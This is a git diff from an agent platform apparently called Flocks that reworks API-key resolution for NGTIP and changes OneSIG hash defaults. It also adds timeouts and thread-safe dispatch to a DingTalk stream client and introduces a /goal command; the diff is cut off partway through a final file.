diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
index e5041dcea..f07583181 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip.handler.py
@@ -60,8 +60,31 @@ def _ensure_scheme(url: str) -> str:
     return url
 
 
-def _resolve_runtime_config() -> tuple[str, str, int, str, bool]:
-    """Returns (platform_base_url, query_base_url, timeout, apikey, verify_ssl)."""
+def _resolve_api_key(
+    raw: dict[str, Any],
+    *config_keys: str,
+    secret_names: tuple[str, ...] = (),
+    env_name: Optional[str] = None,
+) -> Optional[str]:
+    """Return the first truthy key from raw[config_keys] refs, then named secrets, then the env_name variable (None if unset or not given)."""
+    for key in config_keys:
+        value = _resolve_ref(raw.get(key))
+        if value:
+            return value
+
+    manager = _get_secret_manager()
+    for secret_name in secret_names:
+        value = manager.get(secret_name)
+        if value:
+            return value
+
+    if env_name:
+        return os.getenv(env_name)
+    return None
+
+
+def _resolve_runtime_config() -> tuple[str, str, int, Optional[str], Optional[str], bool]:
+    """Returns platform/query base URLs, timeout, query key, platform key, SSL flag."""
     raw = _service_config()
 
     platform_base_url = _ensure_scheme(
@@ -88,23 +111,48 @@ def _resolve_runtime_config() -> tuple[str, str, int, str, bool]:
     except (TypeError, ValueError):
         timeout = DEFAULT_TIMEOUT
 
-    apikey_ref = (
-        raw.get("apiKey")
-        or raw.get("apikey")
-        or raw.get("authentication", {}).get("key")
+    legacy_apikey = (
+        _resolve_ref(
+            raw.get("apiKey")
+            or raw.get("apikey")
+            or raw.get("authentication", {}).get("key")
+        )
+        or _resolve_api_key(
+            raw,
+            secret_names=("ngtip_apikey", f"{SERVICE_ID}_apikey"),
+            env_name="NGTIP_APIKEY",
+        )
     )
-    apikey = (
-        _resolve_ref(apikey_ref)
-        or _get_secret_manager().get("ngtip_apikey")
-        or _get_secret_manager().get(f"{SERVICE_ID}_apikey")
-        or os.getenv("NGTIP_APIKEY")
+
+    query_apikey = (
+        _resolve_api_key(
+            raw,
+            "queryApiKey",
+            "query_apikey",
+            secret_names=("ngtip_query_apikey", f"{SERVICE_ID}_query_apikey"),
+            env_name="NGTIP_QUERY_APIKEY",
+        )
+        or legacy_apikey
     )
-    if not apikey:
-        raise ValueError(
-            "NGTIP API key not found. Configure ngtip_api.apiKey in your service settings "
-            "or set the NGTIP_APIKEY environment variable."
+    platform_apikey = (
+        _resolve_api_key(
+            raw,
+            "platformApiKey",
+            "platform_apikey",
+            secret_names=("ngtip_platform_apikey", f"{SERVICE_ID}_platform_apikey"),
+            env_name="NGTIP_PLATFORM_APIKEY",
         )
-    return platform_base_url, query_base_url, timeout, apikey, _resolve_verify_ssl(raw)
+        or legacy_apikey
+    )
+
+    return (
+        platform_base_url,
+        query_base_url,
+        timeout,
+        query_apikey,
+        platform_apikey,
+        _resolve_verify_ssl(raw),
+    )
 
 
 # ─── helpers ──────────────────────────────────────────────────────────────────
@@ -469,12 +517,27 @@ async def query(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
         return ToolResult(success=False, error=err)
 
     try:
-        _, query_base_url, timeout, apikey, verify_ssl = _resolve_runtime_config()
+        (
+            _,
+            query_base_url,
+            timeout,
+            query_apikey,
+            _,
+            verify_ssl,
+        ) = _resolve_runtime_config()
     except ValueError as exc:
         return ToolResult(success=False, error=str(exc))
+    if not query_apikey:
+        return ToolResult(
+            success=False,
+            error=(
+                "NGTIP query API key not found. Configure queryApiKey in the NGTIP "
+                "device settings, or keep legacy apiKey/NGTIP_APIKEY as fallback."
+            ),
+        )
 
     url = f"{query_base_url}{spec.path}"
-    query_params = {"apikey": apikey, **spec.param_builder(params)}
+    query_params = {"apikey": query_apikey, **spec.param_builder(params)}
     result = await _get_request(url, query_params, timeout, verify_ssl, action)
     if result.success:
         result.metadata = {**(result.metadata or {}), "api": action}
@@ -495,19 +558,39 @@ async def platform(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
         return ToolResult(success=False, error=err)
 
     try:
-        platform_base_url, _, timeout, apikey, verify_ssl = _resolve_runtime_config()
+        (
+            platform_base_url,
+            _,
+            timeout,
+            _,
+            platform_apikey,
+            verify_ssl,
+        ) = _resolve_runtime_config()
     except ValueError as exc:
         return ToolResult(success=False, error=str(exc))
+    if not platform_apikey and not spec.skip_apikey:
+        return ToolResult(
+            success=False,
+            error=(
+                "NGTIP platform API key not found. Configure platformApiKey in the "
+                "NGTIP "
+                "device settings, or keep legacy apiKey/NGTIP_APIKEY as fallback."
+            ),
+        )
 
     url = f"{platform_base_url}{spec.path}"
     payload = spec.payload_builder(params)
 
     if spec.method.upper() == "GET":
         if not spec.skip_apikey:
-            payload = {"apikey": apikey, **payload}
+            payload = {"apikey": platform_apikey, **payload}
         result = await _get_request(url, payload, timeout, verify_ssl, action)
     else:
-        body = {"apikey": apikey, **payload} if not spec.skip_apikey else payload
+        body = (
+            {"apikey": platform_apikey, **payload}
+            if not spec.skip_apikey
+            else payload
+        )
         result = await _post_request(url, body, timeout, verify_ssl, action)
 
     if result.success:
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
index e089a8622..0815140b3 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
@@ -7,7 +7,7 @@ description: >
 description_cn: >
   NGTIP 平台功能分组工具。通过 `action` 参数调用情报管理、资产管理、用户管理、情报生产、
   设备联动、漏洞资产匹配、态势情报订阅和行业攻击情报接口。
-  Base URL 为平台功能端点（默认无端口）。请求体为 JSON，apikey 自动注入。
+  Base URL 为平台功能端点（默认无端口）。请求体为 JSON，平台功能 apikey 自动注入。
   【选用原则】
   - 写入类接口（新增情报/资产/用户）返回值仅含 response_code 和 verbose_msg，无 data；
   - 导出/查询类接口返回 data 含分页信息（current_page / total_page / total_record / items）；
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
index 34f79682f..69b91cfa7 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
@@ -5,7 +5,7 @@ description: >
   intelligence, and IP geolocation APIs.
 description_cn: >
   NGTIP 情报查询分组工具。通过 `action` 参数调用失陷检测、IP 信誉、Hash 信誉、漏洞情报和 IP 地理位置接口。
-  Base URL 为情报查询端点（默认端口 8090）。所有接口支持 GET 传参（apikey 自动注入）。
+  Base URL 为情报查询端点（默认端口 8090）。所有接口支持 GET 传参（情报查询 apikey 自动注入）。
   【选用原则】
   - 出站场景（域名/失陷）优先使用 `query_dns`；
   - 入站场景（IP 行为分析）使用 `query_ip`；
diff --git a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
index c530dfb44..24236178d 100644
--- a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
+++ b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
@@ -32,7 +32,7 @@ credential_fields:
     config_key: api_prefix
     input_type: text
     required: false
-    default: "/api"
+    default: ""
     placeholder: "/api 或留空"
   - key: username
     label: Username
@@ -53,11 +53,11 @@ credential_fields:
     config_key: oaep_hash
     input_type: text
     required: false
-    default: "sha1"
+    default: "sha256"
     placeholder: "sha1 或 sha256"
 defaults:
-  api_prefix: "/api"
-  oaep_hash: "sha1"
+  api_prefix: ""
+  oaep_hash: "sha256"
   timeout: 60
   category: custom
   product_version: "2.5.3 D20260321"
@@ -69,7 +69,7 @@ notes: |
     - api_services.onesig_api.api_prefix   = ""               # 大部分 v2.5.x 部署留空；reverse-proxy 部署才填 "/api"
     - api_services.onesig_api.username     = "admin"
     - api_services.onesig_api.password     = "{secret:onesig_password}"
-    - api_services.onesig_api.oaep_hash    = "sha1"           # JSEncrypt 默认；联调失败可改为 sha256
+    - api_services.onesig_api.oaep_hash    = "sha256"
 
   `api_prefix` 选取建议：
     - 默认值 `""`（空）。绝大多数 OneSIG v2.5.x 设备 nginx 已经把 `/v3/`
@@ -122,11 +122,11 @@ notes: |
       也可以手动调用 `onesig_login` 的 `login` / `logout` 动作管理会话。
 
   RSA-OAEP 与 oaep_hash 联调指引：
-    - JSEncrypt（前端默认）使用 SHA-1 + MGF1-SHA1，因此本插件默认 `oaep_hash: sha1`。
+    - 本插件默认 `oaep_hash: sha256`。
     - 若 `POST /v3/login` 返回 responseCode `1009`（密码无效）或 `1017`（密码错误）但
-      用户名/口令确实正确，先优先怀疑 OAEP 哈希不匹配；将 oaep_hash 切换为 `sha256`
+      用户名/口令确实正确，先优先怀疑 OAEP 哈希不匹配；将 oaep_hash 切换为 `sha1`
       重试一次：
-        api_services.onesig_api.oaep_hash = "sha256"
+        api_services.onesig_api.oaep_hash = "sha1"
     - 改密、删除用户、清空审计、接口启停、设备升级等敏感写操作的 `password` 字段
       也使用同一份公钥与同一组哈希参数加密；切换 oaep_hash 时这些动作会同步生效。
     - 如果对接遇到「公钥过期」型报错，可直接重发；处理器在改密/敏感字段加密前会
diff --git a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
index 2fc541613..f43ba3a2c 100644
--- a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
+++ b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
@@ -25,7 +25,7 @@
 # ``/api/v3/...`` 全部 404。改成空字符串作为开盒即用值；个别需要前缀的
 # 部署仍可在 UI 上把 ``api_prefix`` 设成 ``"/api"`` 或其它值覆盖。
 DEFAULT_API_PREFIX = ""
-DEFAULT_OAEP_HASH = "sha1"
+DEFAULT_OAEP_HASH = "sha256"
 DEFAULT_TIMEOUT = 60
 DEFAULT_VERIFY_SSL = False
 DEFAULT_PERSIST_COOKIES = True
diff --git a/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py b/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
index bc87545f0..5415e4f48 100644
--- a/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
+++ b/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
@@ -443,6 +443,25 @@ async def handle_plain_text(cfg: RuntimeConfig, session: aiohttp.ClientSession,
 
 # ── Tool entry points ─────────────────────────────────────────────────────────
 
+def _tool_result_fields() -> Optional[set[str]]:
+    fields = getattr(ToolResult, "model_fields", None) or getattr(ToolResult, "__fields__", None)
+    if isinstance(fields, dict):
+        return set(fields)
+    return None
+
+
+def _success_result(data: Any) -> ToolResult:
+    fields = _tool_result_fields()
+    if fields is None or "output" in fields:
+        try:
+            return ToolResult(success=True, output=data)
+        except TypeError:
+            if fields is not None and "data" not in fields:
+                raise
+            pass
+    return ToolResult(success=True, **{"data": data})
+
+
 async def _run(action: str, params: dict[str, Any]) -> ToolResult:
     handler_fn = _ACTION_MAP.get(action)
     if handler_fn is None:
@@ -458,7 +477,7 @@ async def _run(action: str, params: dict[str, Any]) -> ToolResult:
         timeout_obj = aiohttp.ClientTimeout(total=cfg.timeout)
         async with aiohttp.ClientSession(connector=connector, timeout=timeout_obj) as session:
             data = await handler_fn(cfg, session, params)
-        return ToolResult(success=True, data=data)
+        return _success_result(data)
     except Exception as exc:
         return ToolResult(success=False, error=str(exc))
 
diff --git a/flocks/acp/agent.py b/flocks/acp/agent.py
index 3b9796e51..ae2ed6f6f 100644
--- a/flocks/acp/agent.py
+++ b/flocks/acp/agent.py
@@ -1189,6 +1189,16 @@ async def set_session_mode(self, params: Dict[str, Any]) -> Dict[str, Any]:
         self._session_manager.set_mode(session_id, mode_id)
         
         return {"_meta": {}}
+
+    @staticmethod
+    def _parse_command_arguments(raw_args: str) -> Any:
+        stripped = (raw_args or "").strip()
+        if not stripped or stripped[0] not in "{[":
+            return None
+        try:
+            return json.loads(stripped)
+        except json.JSONDecodeError:
+            return None
     
     async def prompt(self, params: Dict[str, Any]) -> Dict[str, Any]:
         """
@@ -1313,6 +1323,7 @@ async def prompt(self, params: Dict[str, Any]) -> Dict[str, Any]:
             session_id=session_id,
             command=cmd["name"],
             arguments=cmd["args"],
+            arguments_json=self._parse_command_arguments(cmd["args"]),
             model=f"{model['providerID']}/{model['modelID']}",
             agent=agent,
             directory=directory,
diff --git a/flocks/agent/agents/rex/prompt_builder.py b/flocks/agent/agents/rex/prompt_builder.py
index ffdcabc74..4435432c0 100644
--- a/flocks/agent/agents/rex/prompt_builder.py
+++ b/flocks/agent/agents/rex/prompt_builder.py
@@ -59,7 +59,7 @@ def build_dynamic_rex_prompt(
     skills_section = _build_rex_skills_section(available_skills)
     workflows_section = build_workflows_section(available_workflows or [])
     security_priority = _build_security_priority_section(available_agents)
-    im_send_section = _build_im_send_section()
+    im_send_section = _build_im_send_pointer_section()
     anti_patterns = _build_rex_anti_patterns_section()
     command_guidance_section = _build_command_guidance_section()
     task_management_section = _task_management_section(use_task_system)
@@ -429,99 +429,8 @@ def _build_security_priority_section(available_agents: List["AvailableAgent"]) -
 Security sub-agents still have dedicated toolsets and should be preferred for non-trivial security analysis."""
 
 
-def _build_im_send_section() -> str:
-    return """### IM Send Protocol (MANDATORY when user asks to send a message to WeCom/Feishu/DingTalk)
+def _build_im_send_pointer_section() -> str:
+    return """### IM Messaging
 
-**Trigger**: Any request that involves sending a message to an IM platform (企业微信/WeCom、飞书/Feishu、钉钉/DingTalk).
-
-**Execute this exact sequence — no deviations:**
-
-#### Step 1 — Identify how the user is talking to you
-
-Check your system prompt for a `## Current IM Channel Context` block:
-
-| System prompt contains | Meaning | Action |
-|------------------------|---------|--------|
-| `## Current IM Channel Context` block present | User is chatting via an IM channel (Feishu/WeCom/DingTalk). The block contains the current Session ID and platform. | Use that Session ID as the **pre-selected default** → skip to Step 4, unless the user explicitly asked to send to a different session |
-| No such block | User is chatting via **Flocks Web UI** — this is NOT an IM session. You do NOT have a target session ID yet. | Proceed to Step 2 |
-
-#### Step 2 — Discover sessions (only if Step 1 found nothing)
-Call `session_manage(action="list", category="user", status="active")`.
-Filter results to sessions whose `title` starts with `[Wecom]`, `[Feishu]`, or `[Dingtalk]`.
-
-If no IM sessions found → stop and tell the user:
-> 未找到活跃的 IM session。请先在企业微信/飞书/钉钉中向 Flocks 机器人发送任意消息以建立 session。
-
-#### Step 3 — Ask user to pick a session (ALWAYS, unless session already resolved above)
-
-Use the `question` tool. Build options from the discovered sessions, and always append an "我不知道" option at the end:
-
-```
-question([{
-  "question": "您想要向 IM 中的哪个 session 发送消息？",
-  "type": "choice",
-  "options": [
-    // one entry per discovered IM session:
-    { "label": "<session title>", "description": "<session_id>" },
-    // always append this last:
-    { "label": "我不知道" }
-  ]
-}])
-```
-
-**After the user answers:**
-
-| User selected | Action |
-|---------------|--------|
-| A specific session | Use that option's `description` as `session_id`, proceed to Step 4 |
-| "我不知道" | Stop. Reply to the user: "如果您不确定是哪个 session，请先在群聊里 @机器人 发一条消息，例如：「你的 session id 是什么」，机器人会回复对应的 session id，然后再告诉我。" Do NOT proceed to send. |
-| User already gave an exact session ID | Skip Step 3 entirely, proceed to Step 4 |
-| User named a platform but no session ID | Show only sessions for that platform |
-
-#### Step 4 — Map title prefix to channel_type
-
-| Title prefix | channel_type |
-|--------------|--------------|
-| `[Wecom]`    | `wecom`      |
-| `[Feishu]`   | `feishu`     |
-| `[Dingtalk]` | `dingtalk`   |
-
-#### Step 5 — Send
-
-```
-channel_message(session_id="<id>", message="<content>", channel_type="<type>")
-```
-
-#### Step 6 — Report
-- Success: confirm which session/platform received it.
-- Failure: show the error; suggest checking bot connectivity.
-
----
-
-### IM Session Resolution for schedule_task_create (MANDATORY)
-
-**Trigger**: User asks to create a scheduled or queued task whose action includes sending a message to an IM platform.
-
-Before calling `schedule_task_create`, you MUST resolve the target IM session id and embed it into the task `description`. The task runs unattended — it cannot ask the user at execution time.
-
-**Protocol (run BEFORE schedule_task_create):**
-
-1. Follow **Steps 1–3 above** to resolve `session_id` and `channel_type`.
-   - If the user selects "我不知道" → stop. Do NOT create the task. Tell the user they must provide a session id first.
-2. Once resolved, embed both values into the `description` field:
-
-```
-schedule_task_create(
-  title="...",
-  description="... 发送到 IM channel_type=<wecom|feishu|dingtalk> session_id=<id>",
-  ...
-)
-```
-
-3. Also include them in `user_prompt` so the executing agent can parse them:
-
-```
-user_prompt="向 <platform> session <session_id> 发送消息：<message content>"
-```
-
-**Why this is required**: The task executor runs in a new session with no user present. Without the session_id baked in, it cannot ask — and will silently fail or send to the wrong target."""
+When the user wants to send a message to an IM platform, call `im_send_message`.
+When creating a scheduled task that sends to an IM platform later, resolve the target `session_id` with `im_send_message(resolve_only=true)` before calling `schedule_task_create`."""
diff --git a/flocks/agent/registry.py b/flocks/agent/registry.py
index 6f179c4a0..c2b001985 100644
--- a/flocks/agent/registry.py
+++ b/flocks/agent/registry.py
@@ -333,7 +333,8 @@ def _consume_agents(agents: list, source: str) -> None:
             consumer=_consume_agents,
             yaml_item_factory=_yaml_to_agent_info,
         ))
-        PluginLoader.load_all(
+        PluginLoader.load_extension(
+            "AGENTS",
             extra_sources=cfg.plugin or [],
             project_dir=Path.cwd(),
         )
diff --git a/flocks/channel/builtin/dingtalk/channel.py b/flocks/channel/builtin/dingtalk/channel.py
index 276112bc9..30d4874c0 100644
--- a/flocks/channel/builtin/dingtalk/channel.py
+++ b/flocks/channel/builtin/dingtalk/channel.py
@@ -73,6 +73,13 @@ def validate_config(self, config: dict) -> Optional[str]:
                 "Missing required config: appKey/appSecret (also accepted as "
                 "clientId/clientSecret), at top-level or under accounts.<name>"
             )
+        for account in accounts:
+            app_key = str(account.get("appKey") or account.get("clientId") or "")
+            if app_key.startswith("dingtalk_"):
+                return (
+                    "Invalid DingTalk Client ID: use the app AppKey, for example "
+                    "'dingxxxxxxxxxxxxxxxx', not a value prefixed with 'dingtalk_'."
+                )
         return None
 
     # ------------------------------------------------------------------
diff --git a/flocks/channel/builtin/dingtalk/stream.py b/flocks/channel/builtin/dingtalk/stream.py
index 75581860b..8792e3e30 100644
--- a/flocks/channel/builtin/dingtalk/stream.py
+++ b/flocks/channel/builtin/dingtalk/stream.py
@@ -34,6 +34,8 @@
 import platform
 import re
 import time
+from types import MethodType
+from urllib.parse import quote_plus
 import uuid
 from typing import Any, Awaitable, Callable, Optional
 
@@ -72,6 +74,7 @@
 # us distinguish "wrong key/secret" from "transient network blip".
 _GATEWAY_OPEN_URL = "https://api.dingtalk.com/v1.0/gateway/connections/open"
 _GATEWAY_PREFLIGHT_TIMEOUT = 10.0
+_SDK_OPEN_CONNECTION_TIMEOUT = 10.0
 
 # DingTalk error codes that mean "the credentials / app are not valid"
 # — retrying with the same secret will never succeed.  Codes are
@@ -232,6 +235,81 @@ async def _preflight_open_connection(
     )
 
 
+def _safe_get_host_ip(client: Any) -> str:
+    """Best-effort host IP for the SDK gateway payload."""
+    getter = getattr(client, "get_host_ip", None)
+    if getter is None:
+        return ""
+    try:
+        return str(getter() or "")
+    except Exception:
+        return ""
+
+
+def _install_bounded_open_connection(client: Any) -> None:
+    """Patch the SDK's blocking gateway open call with a finite timeout.
+
+    dingtalk-stream 0.24.x exposes an async ``start()``, but it calls a
+    synchronous ``requests.post`` without a timeout inside
+    ``open_connection``.  Keeping the patch on the client instance avoids
+    changing global SDK behavior while guaranteeing this runner cannot
+    park forever on a gateway TCP read.
+    """
+
+    def _open_connection_with_timeout(self: Any) -> Optional[dict]:
+        import requests
+
+        api = getattr(type(self), "OPEN_CONNECTION_API", _GATEWAY_OPEN_URL)
+        logger = getattr(self, "logger", None)
+        if logger is not None:
+            logger.info("open connection, url=%s", api)
+
+        request_headers = {
+            "Content-Type": "application/json",
+            "Accept": "application/json",
+            "User-Agent": (
+                f"FlocksDingTalkStream/1.0 Python/{platform.python_version()}"
+            ),
+        }
+        topics = []
+        if getattr(self, "_is_event_required", False):
+            topics.append({"type": "EVENT", "topic": "*"})
+        callback_map = getattr(self, "callback_handler_map", {}) or {}
+        for topic in callback_map.keys():
+            topics.append({"type": "CALLBACK", "topic": topic})
+
+        credential = getattr(self, "credential", None)
+        request_body = json.dumps({
+            "clientId": getattr(credential, "client_id", ""),
+            "clientSecret": getattr(credential, "client_secret", ""),
+            "subscriptions": topics,
+            "ua": "flocks-dingtalk-stream/1.0",
+            "localIp": _safe_get_host_ip(self),
+        }).encode("utf-8")
+
+        response_text = ""
+        try:
+            response = requests.post(
+                api,
+                headers=request_headers,
+                data=request_body,
+                timeout=_SDK_OPEN_CONNECTION_TIMEOUT,
+            )
+            response_text = response.text
+            response.raise_for_status()
+            return response.json()
+        except Exception as exc:
+            if logger is not None:
+                logger.error(
+                    "open connection failed, error=%s, response.text=%s",
+                    exc,
+                    response_text,
+                )
+            return None
+
+    client.open_connection = MethodType(_open_connection_with_timeout, client)
+
+
 # ---------------------------------------------------------------------------
 # Gating helpers (mirrors hermes-agent's DingTalkAdapter logic)
 # ---------------------------------------------------------------------------
@@ -579,6 +657,7 @@ def __init__(
         self._stream_client: Any = None
         self._stream_task: Optional[asyncio.Task] = None
         self._running = False
+        self._loop: Optional[asyncio.AbstractEventLoop] = None
 
         # ── R3: bounded inbound dispatch queue + worker pool ─────────
         # Both knobs are tunable per-account so noisy tenants can lift
@@ -636,6 +715,7 @@ async def run(self, abort_event: Optional[asyncio.Event] = None) -> None:
 
         credential = dingtalk_stream.Credential(self.client_id, self.client_secret)
         self._stream_client = dingtalk_stream.DingTalkStreamClient(credential)
+        _install_bounded_open_connection(self._stream_client)
 
         handler = _IncomingHandler(self)
         self._stream_client.register_callback_handler(
@@ -660,6 +740,7 @@ async def run(self, abort_event: Optional[asyncio.Event] = None) -> None:
         })
 
         self._running = True
+        self._loop = asyncio.get_running_loop()
         self._stream_task = asyncio.create_task(self._run_with_reconnect())
         try:
             if abort_event is None:
@@ -686,6 +767,52 @@ async def _wait_for_abort(self, abort_event: asyncio.Event) -> None:
             task.cancel()
         await asyncio.gather(*pending, return_exceptions=True)
 
+    async def _start_stream_client_session(self) -> None:
+        """Open one DingTalk websocket session under Flocks cancellation rules.
+
+        The official SDK's ``start()`` has its own forever loop and performs a
+        synchronous no-timeout gateway request on the caller's event loop.  We
+        keep using the SDK's credential, callback, keepalive, and message
+        background-task helpers, but drive one connection attempt ourselves so
+        a slow DingTalk gateway cannot block FastAPI and shutdown can cancel
+        promptly.
+        """
+        import websockets
+
+        client = self._stream_client
+        if client is None:
+            raise RuntimeError("DingTalk stream client is not initialised")
+
+        client.pre_start()
+        connection = await asyncio.to_thread(client.open_connection)
+        if not self._running:
+            return
+        if not connection:
+            raise RuntimeError("DingTalk SDK open_connection failed")
+
+        endpoint = connection.get("endpoint")
+        ticket = connection.get("ticket")
+        if not endpoint or not ticket:
+            raise RuntimeError("DingTalk SDK open_connection returned no endpoint")
+
+        uri = f"{endpoint}?ticket={quote_plus(str(ticket))}"
+        keepalive_task: Optional[asyncio.Task] = None
+        async with websockets.connect(uri) as websocket:
+            client.websocket = websocket
+            keepalive_task = asyncio.create_task(client.keepalive(websocket))
+            try:
+                async for raw_message in websocket:
+                    if not self._running:
+                        return
+                    json_message = json.loads(raw_message)
+                    asyncio.create_task(client.background_task(json_message))
+            finally:
+                if keepalive_task is not None:
+                    keepalive_task.cancel()
+                    await asyncio.gather(keepalive_task, return_exceptions=True)
+                if getattr(client, "websocket", None) is websocket:
+                    client.websocket = None
+
     async def _run_with_reconnect(self) -> None:
         backoff_idx = 0
         while self._running:
@@ -711,15 +838,15 @@ async def _run_with_reconnect(self) -> None:
                 return
             except Exception as exc:
                 # Transient pre-flight failure (network blip, 5xx, …) —
-                # log and fall through to the SDK, which will re-attempt
-                # ``open_connection`` with its own loop.
+                # log and still attempt one bounded SDK gateway open; the
+                # outer reconnect loop applies normal backoff afterwards.
                 log.warning("dingtalk.stream.preflight_transient_error", {
                     "account": self.account_id, "error": str(exc),
                 })
 
             # ── R1: stall accounting ─────────────────────────────────
-            # Snapshot inbound counters around the SDK's ``start()`` so
-            # we can later tell apart:
+            # Snapshot inbound counters around one stream session so we
+            # can later tell apart:
             #   (a) healthy long-lived connection (duration ≫ threshold)
             #   (b) connection torn down by an exception → backoff path
             #   (c) silent gateway rejection (clean return, < threshold,
@@ -734,7 +861,7 @@ async def _run_with_reconnect(self) -> None:
             # tried to open a websocket.
             try:
                 log.info("dingtalk.stream.starting", {"account": self.account_id})
-                await self._stream_client.start()
+                await self._start_stream_client_session()
                 clean_return = True
             except asyncio.CancelledError:
                 return
@@ -875,6 +1002,7 @@ async def _shutdown(self) -> None:
         self._dispatch_queue = None
 
         self._stream_client = None
+        self._loop = None
 
     # -- inbound dispatch ------------------------------------------------
 
@@ -955,6 +1083,28 @@ def _enqueue_dispatch(self, chatbot_msg: Any) -> None:
         path.  Burst load (group floods) sheds gracefully instead of
         spinning unbounded background tasks (R3).
         """
+        owner_loop = self._loop
+        if owner_loop is not None:
+            try:
+                running_loop = asyncio.get_running_loop()
+            except RuntimeError:
+                running_loop = None
+            if running_loop is not owner_loop:
+                try:
+                    owner_loop.call_soon_threadsafe(
+                        self._enqueue_dispatch_on_owner_loop,
+                        chatbot_msg,
+                    )
+                except RuntimeError:
+                    log.warning("dingtalk.stream.dispatch_loop_unavailable", {
+                        "account": self.account_id,
+                    })
+                return
+
+        self._enqueue_dispatch_on_owner_loop(chatbot_msg)
+
+    def _enqueue_dispatch_on_owner_loop(self, chatbot_msg: Any) -> None:
+        """Enqueue on the loop that owns the asyncio.Queue."""
         # ``_messages_received`` powers the stall-detection counter
         # (R1); count what the SDK actually delivered, even if we end
         # up shedding the message due to back-pressure.
diff --git a/flocks/channel/inbound/dispatcher.py b/flocks/channel/inbound/dispatcher.py
index 96987c237..37f38a242 100644
--- a/flocks/channel/inbound/dispatcher.py
+++ b/flocks/channel/inbound/dispatcher.py
@@ -1142,8 +1142,9 @@ async def _append_user_message(
         import mimetypes
         import os
         from pathlib import Path
-        from urllib.parse import unquote, urlparse
+        from urllib.parse import urlparse
 
+        from flocks.session.utils.file_extractor import file_url_to_path
         from flocks.session.message import FilePart, Message, MessageRole
 
         create_kwargs: dict = dict(
@@ -1197,8 +1198,8 @@ async def _append_user_message(
                 })
             elif scheme in ("", "file"):
                 # Local file already downloaded by the channel plugin (e.g. weixin).
-                # file:// URIs may have URL-encoded paths (e.g. Chinese filenames).
-                local_path = unquote(parsed.path) if scheme == "file" else msg.media_url
+                # file:// URIs may have URL-encoded or Windows drive paths.
+                local_path = file_url_to_path(msg.media_url) if scheme == "file" else msg.media_url
                 if not os.path.isfile(local_path):
                     log.warning("dispatcher.inbound_media_missing", {
                         "channel_id": msg.channel_id,
diff --git a/flocks/command/command.py b/flocks/command/command.py
index 7e9190753..c9322ba72 100644
--- a/flocks/command/command.py
+++ b/flocks/command/command.py
@@ -202,6 +202,17 @@ def _ensure_defaults(cls) -> None:
                 allow_attachments=False,
                 visible_surfaces=("webui", "tui", "acp", "cli"),
             ),
+            CommandDef(
+                name="goal",
+                description="Set a persistent session goal",
+                template="Set session goal: $ARGUMENTS",
+                agent="rex",
+                execution_kind="direct",
+                allow_attachments=False,
+                visible_surfaces=ALL_SURFACES,
+                requires_existing_session=True,
+                channel_safe=True,
+            ),
             CommandDef(
                 name="model",
                 description="Change or inspect the current model",
diff --git a/flocks/command/direct.py b/flocks/command/direct.py
index 47f9851a1..c3ca6c9e8 100644
--- a/flocks/command/direct.py
+++ b/flocks/command/direct.py
@@ -6,12 +6,13 @@
 
 from collections import defaultdict
 from dataclasses import dataclass
-from typing import Optional
+from typing import Any, Optional
 
 from flocks.agent.agent import AvailableAgent
 from flocks.agent.registry import Agent
 from flocks.command.command import Command, CommandInfo, CommandSurface
 from flocks.command.help import format_help
+from flocks.session.goal import GoalManager
 from flocks.skill.skill import Skill
 from flocks.tool.registry import ToolRegistry
 
@@ -132,7 +133,9 @@ async def run_direct_command(
     name: str,
     *,
     args: str = "",
+    args_json: Optional[Any] = None,
     surface: Optional[CommandSurface] = None,
+    session_id: Optional[str] = None,
 ) -> DirectCommandResult:
     """Execute a direct command and return its result."""
     resolved = Command.resolve(name)
@@ -141,6 +144,7 @@ async def run_direct_command(
 
     name = resolved.name
     args = (args or "").strip()
+    _ = args_json
 
     if name == "help":
         return DirectCommandResult(handled=True, text=format_help(surface=surface))
@@ -148,6 +152,27 @@ async def run_direct_command(
     if name == "clear":
         return DirectCommandResult(handled=True, clear_history=True)
 
+    if name == "goal":
+        if not session_id:
+            return DirectCommandResult(
+                handled=True,
+                success=False,
+                text="Usage: /goal requires an active session.",
+            )
+
+        try:
+            state = await GoalManager.set_goal(session_id, args)
+        except ValueError:
+            return DirectCommandResult(
+                handled=True,
+                success=False,
+                text="Usage: /goal <objective>",
+            )
+        return DirectCommandResult(
+            handled=True,
+            prompt=GoalManager.goal_prompt(state.objective),
+        )
+
     if name == "tools":
         if not args or args == "list":
             return DirectCommandResult(handled=True, text=build_tools_catalog_summary())
diff --git a/flocks/command/handler.py b/flocks/command/handler.py
index 808693bc2..6f5064bad 100644
--- a/flocks/command/handler.py
+++ b/flocks/command/handler.py
@@ -6,6 +6,7 @@
 
 from flocks.command.command import Command, CommandSurface
 from flocks.command.direct import run_direct_command
